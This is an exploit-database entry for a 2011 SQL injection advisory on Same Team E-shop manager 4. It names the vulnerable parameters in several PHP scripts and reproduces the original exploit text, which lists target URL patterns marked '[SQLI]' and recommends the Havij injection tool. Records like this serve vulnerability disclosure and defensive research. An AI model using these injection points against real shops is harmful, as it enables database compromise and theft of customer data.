Same Team E-shop manager SQL Injection exploit

vendor:

E-shop manager

by:

Number 7

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: E-shop manager

Affected Version From: 4

Affected Version To: 4

Patch Exists: NO

Related CWE: N/A

CPE: a:sameteam:eshop_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2011

Same Team E-shop manager SQL Injection exploit

Multiple SQL injection vulnerabilities exist in Same Team E-shop manager, which could allow an attacker to execute arbitrary SQL commands on the underlying database. The vulnerabilities exist in the 'id_shop', 'id_article', 'ref' parameters of the 'catalogue.php', 'article.php', 'banniere.php', 'detail_news.php', 'detail_produit.php' scripts, respectively.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: [Same Team E-shop manager SQL Injection exploit]
# Date: [19-06-2011]
# Author: [Number 7]
# Software Link: [http://www.sameteam.com.tn/site/fr/eshop-manager.23.html]
# Tested on: [Linux]
_____________________________________________________________________________
exploits:
http://www.domain.com.tn/path/catalogue.php?id_shop=7[SQLI]

http://www.domain.com.tn/path/article.php?id_article=7[SQLI]

http://www.domain.com.tn/path/banniere.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_news.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]

----------------------------------------_----------------------------------------


Use Havij :^D it's fastest for the 4th version :D
_____________________________________________________________________________
############ Made in Tunisia +216 ############
[~] Greetz tO: [Shichemt-Älen/Ares/SWAT/S-MAN/Wx #all tunisian hackers]
[~] Home     : Tunisia :^D
############ Made in Tunisia +216 ############